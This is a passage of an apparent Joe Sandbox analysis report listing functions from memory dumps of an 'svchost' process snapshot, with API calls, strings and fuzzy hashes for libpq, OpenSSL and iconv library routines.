                                                                                              • Part of subcall function 00007FFDA36E2D70: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,-00000001,00007FFDA36D15B3), ref: 00007FFDA36E2D89
                                                                                              • Part of subcall function 00007FFDA36E2D70: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFDA36E2DB1
                                                                                              • Part of subcall function 00007FFDA36E2D70: libintl_dgettext.LIBINTL-9 ref: 00007FFDA36E2DD2
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451764609.00007FFDA36D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFDA36D0000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3451740549.00007FFDA36D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451805412.00007FFDA36F8000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451839464.00007FFDA371E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451862794.00007FFDA371F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda36d0000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: _errno$freelibintl_dgettextmalloc
                                                                                            • String ID: %s/%s$could not acquire SSPI credentials$duplicate SSPI authentication request$host name must be specified$kerberos$negotiate$out of memory
                                                                                            • API String ID: 1401199814-1896325366
                                                                                            • Opcode ID: 16a1925dbea3c8fa90425e6cbe3e9cd78d3a28eedbc861325efaf6458eb9bf94
                                                                                            • Instruction ID: 2c029155758cbe8e01b869e25604a5429c4b0da9f11569c48209fbcd7618d682
                                                                                            • Opcode Fuzzy Hash: 16a1925dbea3c8fa90425e6cbe3e9cd78d3a28eedbc861325efaf6458eb9bf94
                                                                                            • Instruction Fuzzy Hash: 5941A232B0AE8241FA108F24A5602B92762EB45BE4F5C6235EA6D277D6DF3DD4458308
                                                                                            Function 00007FFDA360C3E0 Relevance: 15.1, APIs: 10, Instructions: 99COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • X509_get_subject_name.LIBCRYPTO-3-X64(?,?,00000001,00007FFDA360BDFE), ref: 00007FFDA360C4AC
                                                                                            • X509_NAME_dup.LIBCRYPTO-3-X64(?,?,00000001,00007FFDA360BDFE), ref: 00007FFDA360C4B9
                                                                                            • OPENSSL_sk_find.LIBCRYPTO-3-X64(?,?,00000001,00007FFDA360BDFE), ref: 00007FFDA360C4CC
                                                                                            • X509_NAME_free.LIBCRYPTO-3-X64(?,?,00000001,00007FFDA360BDFE), ref: 00007FFDA360C4D8
                                                                                            • OPENSSL_sk_push.LIBCRYPTO-3-X64(?,?,00000001,00007FFDA360BDFE), ref: 00007FFDA360C4E5
                                                                                            • OSSL_STORE_INFO_free.LIBCRYPTO-3-X64(?,?,00000001,00007FFDA360BDFE), ref: 00007FFDA360C4F1
                                                                                            • OSSL_STORE_eof.LIBCRYPTO-3-X64(?,?,00000001,00007FFDA360BDFE), ref: 00007FFDA360C4F9
                                                                                            • ERR_clear_error.LIBCRYPTO-3-X64(?,?,00000001,00007FFDA360BDFE), ref: 00007FFDA360C506
                                                                                            • X509_NAME_free.LIBCRYPTO-3-X64(?,?,00000001,00007FFDA360BDFE), ref: 00007FFDA360C510
                                                                                            • OSSL_STORE_close.LIBCRYPTO-3-X64(?,?,00000001,00007FFDA360BDFE), ref: 00007FFDA360C51B
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451563505.00007FFDA3601000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFDA3600000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3451531136.00007FFDA3600000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451655757.00007FFDA3690000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451689034.00007FFDA36BD000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451714646.00007FFDA36C1000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda3600000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: X509_$E_free$E_closeE_dupE_eofL_sk_findL_sk_pushO_freeR_clear_errorX509_get_subject_name
                                                                                            • String ID:
                                                                                            • API String ID: 2042042120-0
                                                                                            • Opcode ID: 720656e64d7e1fdc1c214f3e6499e0f174ef5a63f77c434a52f6c6fa4d383162
                                                                                            • Instruction ID: b6b3b59ea172f8bf0839f5bb147e4f8d8d3f0c18bb5bb342b0034250316f9bf0
                                                                                            • Opcode Fuzzy Hash: 720656e64d7e1fdc1c214f3e6499e0f174ef5a63f77c434a52f6c6fa4d383162
                                                                                            • Instruction Fuzzy Hash: 5F312010F0F25306FD65AE56553227956826F8BBC0F4CA474ED0EBBB87EE2EE401422D
                                                                                            Function 66015AE0 Relevance: 14.2, APIs: 3, Strings: 5, Instructions: 222COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3448016000.0000000066001000.00000020.00000001.01000000.00000013.sdmp, Offset: 66000000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3447969945.0000000066000000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3448075798.000000006601E000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3448241150.00000000660EF000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3448283516.00000000660F0000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3448334850.00000000660F1000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3448369571.00000000660F4000.00000008.00000001.01000000.00000013.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3448405346.00000000660F5000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_66000000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: _errno
                                                                                            • String ID: //IGNORE$//IGNORE$//TRANSL$//TRANSL$CP437
                                                                                            • API String ID: 2918714741-2468171555
                                                                                            • Opcode ID: 7b322433e300fd885f07d7ef707a9bfde59920948da5c07da5db6059496cd6cd
                                                                                            • Instruction ID: d2c05d5ca6c8e0663acaa9097dddda785b261d31dc9eefd4489ad2b6cb71b33b
                                                                                            • Opcode Fuzzy Hash: 7b322433e300fd885f07d7ef707a9bfde59920948da5c07da5db6059496cd6cd
                                                                                            • Instruction Fuzzy Hash: 8991A0FAA096408AEB228FA5E49834EFFE1F705788F848525DB894F750EB7DC095C740
                                                                                            Function 00007FFDA36F2B00 Relevance: 14.2, APIs: 2, Strings: 6, Instructions: 218stringCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451764609.00007FFDA36D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFDA36D0000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3451740549.00007FFDA36D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451805412.00007FFDA36F8000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451839464.00007FFDA371E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451862794.00007FFDA371F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda36d0000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: strrchr$fwrite
                                                                                            • String ID: %$%.$*$0$NaN$e
                                                                                            • API String ID: 1053785018-1973797268
                                                                                            • Opcode ID: b59857e77db2e1ee060cec4590f9902832b6efd9ee2e63a1567acb8fcf786e9f
                                                                                            • Instruction ID: a4d74be4153d3f6d3e31bf414d0bab2ce8288d5dd037aca7d4315858fd158330
                                                                                            • Opcode Fuzzy Hash: b59857e77db2e1ee060cec4590f9902832b6efd9ee2e63a1567acb8fcf786e9f
                                                                                            • Instruction Fuzzy Hash: 05918A26B0F6C246F3558B25A4A037A66A2BF55348F186135DF4D3778BDE3FE4418B08
                                                                                            Function 00007FFDA36DB5B0 Relevance: 14.2, APIs: 2, Strings: 6, Instructions: 172COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FFDA36DB80E
                                                                                              • Part of subcall function 00007FFDA36E2D70: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,-00000001,00007FFDA36D15B3), ref: 00007FFDA36E2D89
                                                                                              • Part of subcall function 00007FFDA36E2D70: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFDA36E2DB1
                                                                                              • Part of subcall function 00007FFDA36E2D70: libintl_dgettext.LIBINTL-9 ref: 00007FFDA36E2DD2
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451764609.00007FFDA36D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFDA36D0000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3451740549.00007FFDA36D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451805412.00007FFDA36F8000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451839464.00007FFDA371E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451862794.00007FFDA371F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda36d0000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: _errno$freelibintl_dgettext
                                                                                            • String ID: another command is already in progress$cannot queue commands during COPY$command string is a null pointer$no connection to the server$number of parameters must be between 0 and %d$statement name is a null pointer
                                                                                            • API String ID: 3960679934-1309384198
                                                                                            • Opcode ID: 0e330906b418701e01eb9d2b5c63559fc8e44ce1ce1a4ee1f627a24ca4ae6f95
                                                                                            • Instruction ID: ebab09ed56789034b533c16d2a0f8f2343d4ef50870ce4fd0db25a13a071b833
                                                                                            • Opcode Fuzzy Hash: 0e330906b418701e01eb9d2b5c63559fc8e44ce1ce1a4ee1f627a24ca4ae6f95
                                                                                            • Instruction Fuzzy Hash: BF616122B0BA4387FA14AA22A5743B91793AF447C4F1C6434DE0D6778BDE6FE4448318
                                                                                            Function 00007FFDA36E1210 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 146COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451764609.00007FFDA36D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFDA36D0000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3451740549.00007FFDA36D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451805412.00007FFDA36F8000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451839464.00007FFDA371E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451862794.00007FFDA371F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda36d0000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: _errno
                                                                                            • String ID: could not open file "%s": %s$could not write to file "%s": %s
                                                                                            • API String ID: 2918714741-749339701
                                                                                            • Opcode ID: 68e8703752707eb806002c41a8547b1e3c6989b22233b08369d1c6125f68ce23
                                                                                            • Instruction ID: 1ef34413f6bfeb700b5c8d9132888728de6b7be24fbad0f064111baae7984e95
                                                                                            • Opcode Fuzzy Hash: 68e8703752707eb806002c41a8547b1e3c6989b22233b08369d1c6125f68ce23
                                                                                            • Instruction Fuzzy Hash: B851E672B0E64286F610AF21D4602BA6752BF84790F582135EF4D677D7DF3EE4088B58
                                                                                            Function 00007FFDA36E98F0 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 124COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                              • Part of subcall function 00007FFDA36EC3B0: Sleep.KERNEL32(?,?,?,00007FFDA36E2E38,?,?,?,?,00007FFDA36E2C5E,?,?,?,00007FFDA36D1068), ref: 00007FFDA36EC3D2
                                                                                              • Part of subcall function 00007FFDA36EC3B0: InitializeCriticalSection.KERNEL32(?,?,?,00007FFDA36E2E38,?,?,?,?,00007FFDA36E2C5E,?,?,?,00007FFDA36D1068), ref: 00007FFDA36EC3F0
                                                                                              • Part of subcall function 00007FFDA36EC3B0: EnterCriticalSection.KERNEL32(?,?,?,00007FFDA36E2E38,?,?,?,?,00007FFDA36E2C5E,?,?,?,00007FFDA36D1068), ref: 00007FFDA36EC406
                                                                                            • BIO_meth_free.LIBCRYPTO-3-X64 ref: 00007FFDA36E9A1D
                                                                                            • ERR_new.LIBCRYPTO-3-X64 ref: 00007FFDA36E9A2E
                                                                                            • ERR_set_debug.LIBCRYPTO-3-X64 ref: 00007FFDA36E9A46
                                                                                            • ERR_set_error.LIBCRYPTO-3-X64 ref: 00007FFDA36E9A57
                                                                                            • ERR_new.LIBCRYPTO-3-X64 ref: 00007FFDA36E9A96
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451764609.00007FFDA36D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFDA36D0000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3451740549.00007FFDA36D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451805412.00007FFDA36F8000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451839464.00007FFDA371E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451862794.00007FFDA371F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda36d0000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: CriticalR_newSection$EnterInitializeO_meth_freeR_set_debugR_set_errorSleep
                                                                                            • String ID: D:\a\postgresql-packaging-foundation\postgresql-packaging-foundation\postgresql-16.3\src\interfaces\libpq\fe-secure-openssl.c$libpq socket$my_SSL_set_fd
                                                                                            • API String ID: 1673460624-3482463761
                                                                                            • Opcode ID: f9e68f2ecd182a4570d1478a46c0c75376cdd94b21e91dab4eb55f1775b187cf
                                                                                            • Instruction ID: 676c6b9bf415a01cc3d544aba8dcf9e8a5b6e0fe8bf18cfa149ee9abf35f8ea3
                                                                                            • Opcode Fuzzy Hash: f9e68f2ecd182a4570d1478a46c0c75376cdd94b21e91dab4eb55f1775b187cf
                                                                                            • Instruction Fuzzy Hash: 3841FB90B0F64344FE54AE26A9352BA52935F45BC0F6C7035EC0EA77D7EE6EE4099308
                                                                                            Function 00007FFDA36E3290 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 99networkCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451764609.00007FFDA36D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFDA36D0000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3451740549.00007FFDA36D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451805412.00007FFDA36F8000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451839464.00007FFDA371E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451862794.00007FFDA371F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda36d0000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: ErrorLast_errno$_time64libintl_dgettextselect
                                                                                            • String ID: %s() failed: %s$invalid socket$select$show password_encryption
                                                                                            • API String ID: 577054053-1435312234
                                                                                            • Opcode ID: 41b78291d39fa47844300f65c087e57bdd3a7a51bd038fc3e801bd270b690a37
                                                                                            • Instruction ID: 688373c8a5cd082e8dd77dd1aa8d4f5ae04db5f4e951321c865412d6762167b0
                                                                                            • Opcode Fuzzy Hash: 41b78291d39fa47844300f65c087e57bdd3a7a51bd038fc3e801bd270b690a37
                                                                                            • Instruction Fuzzy Hash: DE41C232B0EAC281F6608F10E4607BA7292FB80754F6C2235EA5D677D6DF3ED4498708
                                                                                            Function 00007FFDA36EA9AE Relevance: 14.1, APIs: 2, Strings: 6, Instructions: 66COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451764609.00007FFDA36D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFDA36D0000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3451740549.00007FFDA36D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451805412.00007FFDA36F8000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451839464.00007FFDA371E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451862794.00007FFDA371F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda36d0000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: fputcisprint
                                                                                            • String ID: %c$ %d$ \x%02x$CopyOutResponse$Flush$mismatched message length: consumed %d, expected %d
                                                                                            • API String ID: 3787447051-3121233105
                                                                                            • Opcode ID: 33fc0a5aa4d03cdc5568adbe1cd14efd1a5f6c3de81a4a7ac237bc0d4d81df2e
                                                                                            • Instruction ID: 1508a5619978eafa486f15abce0b3a8603a60b4dda3edc1997917a170e63a7e7
                                                                                            • Opcode Fuzzy Hash: 33fc0a5aa4d03cdc5568adbe1cd14efd1a5f6c3de81a4a7ac237bc0d4d81df2e
                                                                                            • Instruction Fuzzy Hash: 7221ADA2B1B29641FA10DB15E4617B92363AF407C8F487131DA4E27347CE7FE449D308
                                                                                            Function 00007FFDA36EA6F9 Relevance: 14.1, APIs: 2, Strings: 6, Instructions: 53COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451764609.00007FFDA36D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFDA36D0000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3451740549.00007FFDA36D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451805412.00007FFDA36F8000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451839464.00007FFDA371E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451862794.00007FFDA371F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda36d0000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: fputcisprint
                                                                                            • String ID: "%s"$ %c$ \x%02x$Close$CommandComplete$mismatched message length: consumed %d, expected %d
                                                                                            • API String ID: 3787447051-3282132963
                                                                                            • Opcode ID: 335db59d4bed4dd53630f86e513deae1dc4d565af52ecbb3b73c7182e78e2bfd
                                                                                            • Instruction ID: f933a2d7ed5b3be825f86bc2770fa0e3fa974a3121f8feba2dc22e0fc02c0670
                                                                                            • Opcode Fuzzy Hash: 335db59d4bed4dd53630f86e513deae1dc4d565af52ecbb3b73c7182e78e2bfd
                                                                                            • Instruction Fuzzy Hash: 7F219F62B1B68682FA10DB55E4616F92363AF407C8F8C6132DA0E23357CF6EF549D318
                                                                                            Function 00007FFDA361C360 Relevance: 14.0, APIs: 6, Strings: 2, Instructions: 42COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • ERR_new.LIBCRYPTO-3-X64(?,?,?,00007FFDA3619B10,?,00007FFDA3602E95), ref: 00007FFDA361C38E
                                                                                            • ERR_set_debug.LIBCRYPTO-3-X64(?,?,?,00007FFDA3619B10,?,00007FFDA3602E95), ref: 00007FFDA361C3A6
                                                                                            • ERR_set_error.LIBCRYPTO-3-X64(?,?,?,00007FFDA3619B10,?,00007FFDA3602E95), ref: 00007FFDA361C3B7
                                                                                            • ERR_new.LIBCRYPTO-3-X64(?,?,?,00007FFDA3619B10,?,00007FFDA3602E95), ref: 00007FFDA361C3D0
                                                                                            • ERR_set_debug.LIBCRYPTO-3-X64(?,?,?,00007FFDA3619B10,?,00007FFDA3602E95), ref: 00007FFDA361C3E8
                                                                                            • ERR_set_error.LIBCRYPTO-3-X64(?,?,?,00007FFDA3619B10,?,00007FFDA3602E95), ref: 00007FFDA361C3F9
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451563505.00007FFDA3601000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFDA3600000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3451531136.00007FFDA3600000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451655757.00007FFDA3690000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451689034.00007FFDA36BD000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451714646.00007FFDA36C1000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda3600000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: R_newR_set_debugR_set_error
                                                                                            • String ID: can_renegotiate$ssl\ssl_lib.c
                                                                                            • API String ID: 1552677711-867855671
                                                                                            • Opcode ID: 3a1675180e72825a1a9c0467388758be2d6c99f26fcfcb73c7b2ad0611180d60
                                                                                            • Instruction ID: 34b081976d109f23f3919d93b9c3b855d105c07b6bc3cc41267e03acfe449b02
                                                                                            • Opcode Fuzzy Hash: 3a1675180e72825a1a9c0467388758be2d6c99f26fcfcb73c7b2ad0611180d60
                                                                                            • Instruction Fuzzy Hash: 3E116165F0A14287F784EB24C8A27ED2653EB54740F987072D54CA37D3CE2EE58A8609
                                                                                            Function 00007FFDA364E440 Relevance: 13.6, APIs: 9, Instructions: 128COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • ERR_peek_last_error.LIBCRYPTO-3-X64(?,?,?,?,00007FFDA363F9FC), ref: 00007FFDA364E63C
                                                                                            • ERR_pop_to_mark.LIBCRYPTO-3-X64(?,?,?,?,00007FFDA363F9FC), ref: 00007FFDA364E64C
                                                                                            • ERR_clear_last_mark.LIBCRYPTO-3-X64(?,?,?,?,00007FFDA363F9FC), ref: 00007FFDA364E653
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451563505.00007FFDA3601000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFDA3600000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3451531136.00007FFDA3600000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451655757.00007FFDA3690000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451689034.00007FFDA36BD000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451714646.00007FFDA36C1000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda3600000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: R_clear_last_markR_peek_last_errorR_pop_to_mark
                                                                                            • String ID:
                                                                                            • API String ID: 4503806-0
                                                                                            • Opcode ID: 1653e883ae788b22098aff78b098f66b5393b0d98448a3d5c585c9e523f4069e
                                                                                            • Instruction ID: a5a5f90f6ecdfffc643a3b8295f710dbcd7799d1d123949d10ce67bd4cecbd16
                                                                                            • Opcode Fuzzy Hash: 1653e883ae788b22098aff78b098f66b5393b0d98448a3d5c585c9e523f4069e
                                                                                            • Instruction Fuzzy Hash: 7351E626B0BB8182F6609B15A96037E73A6FF49B84F482135EE5D63786DF3ED411C708
                                                                                            Function 00007FFDA36D25DC Relevance: 13.6, APIs: 5, Strings: 4, Instructions: 88COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FFDA36D25E7
                                                                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FFDA36D2621
                                                                                              • Part of subcall function 00007FFDA36E2D70: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,-00000001,00007FFDA36D15B3), ref: 00007FFDA36E2D89
                                                                                              • Part of subcall function 00007FFDA36E2D70: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFDA36E2DB1
                                                                                              • Part of subcall function 00007FFDA36E2D70: libintl_dgettext.LIBINTL-9 ref: 00007FFDA36E2DD2
                                                                                            Strings
                                                                                            • fe_sendauth: error in SASL authentication, xrefs: 00007FFDA36D2711
                                                                                            • out of memory allocating SASL buffer (%d), xrefs: 00007FFDA36D25F8
                                                                                            • no client response found after SASL exchange success, xrefs: 00007FFDA36D26B8
                                                                                            • AuthenticationSASLFinal received from server, but SASL authentication was not completed, xrefs: 00007FFDA36D2699
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451764609.00007FFDA36D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFDA36D0000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3451740549.00007FFDA36D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451805412.00007FFDA36F8000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451839464.00007FFDA371E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451862794.00007FFDA371F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda36d0000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: _errno$freelibintl_dgettextmalloc
                                                                                            • String ID: AuthenticationSASLFinal received from server, but SASL authentication was not completed$fe_sendauth: error in SASL authentication$no client response found after SASL exchange success$out of memory allocating SASL buffer (%d)
                                                                                            • API String ID: 1401199814-242416509
                                                                                            • Opcode ID: fb1d9456ba725ec95725673f9ffa0fb8971886aa7ff2690fc2b69333031c660f
                                                                                            • Instruction ID: 26d3e4643506909085cdaf9366257bebbdbf6f52430d27abddb7549a977fd4f1
                                                                                            • Opcode Fuzzy Hash: fb1d9456ba725ec95725673f9ffa0fb8971886aa7ff2690fc2b69333031c660f
                                                                                            • Instruction Fuzzy Hash: B0419B2270EB8282FAA49B51F4641B96362FB85BC0F582032DE4D13796DF2FD5558708
                                                                                            Function 66016630 Relevance: 13.6, APIs: 8, Strings: 1, Instructions: 78stringCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3448016000.0000000066001000.00000020.00000001.01000000.00000013.sdmp, Offset: 66000000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3447969945.0000000066000000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3448075798.000000006601E000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3448241150.00000000660EF000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3448283516.00000000660F0000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3448334850.00000000660F1000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3448369571.00000000660F4000.00000008.00000001.01000000.00000013.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3448405346.00000000660F5000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_66000000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: strncmp
                                                                                            • String ID: /c/tmp/iconv-117
                                                                                            • API String ID: 1114863663-2940094699
                                                                                            • Opcode ID: 470f3b171a377214d98a476e199219cf95402c31d2bb5ef18a45091ad314cac6
